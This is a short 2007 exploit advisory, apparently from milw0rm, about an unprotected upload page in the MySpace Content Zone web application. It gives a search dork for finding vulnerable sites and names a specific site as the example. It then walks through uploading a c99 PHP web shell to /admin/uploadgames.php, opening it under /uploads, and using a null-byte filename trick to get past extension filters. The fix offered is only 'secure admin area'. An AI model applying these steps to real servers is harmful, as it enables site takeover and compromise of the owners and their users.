---------------------------------------------------- [+-MySpace Content Zone RFi-+] ---------------------------------------------------- Found By Don & breaker_unit ---------------------------------------------------- Vuln file: /admin/uploadgames.php Fix: secure admin area Dork: "Powered by MySpace Content Zone" go to /admin/uploadgames.php example: http://www.virtualdynamite.com/admin/uploadgames.php and upload your shell - lets say it is named as c99.php ok, now go to /uploads/thumb/c99.php like: http://www.virtualdynamite.com/uploads/flash/c99.php and - what you see ?? :xD your shell! Note1: you can add .php%00.jpeg cause %00 = null Note2: it takes awhile to upload a shell sometimes! Creditz to breaker_unit, h4cky0u.org and str0ke! Don is wishing Happy Holidays to all of you reading this! Cheers! # milw0rm.com [2007-12-18]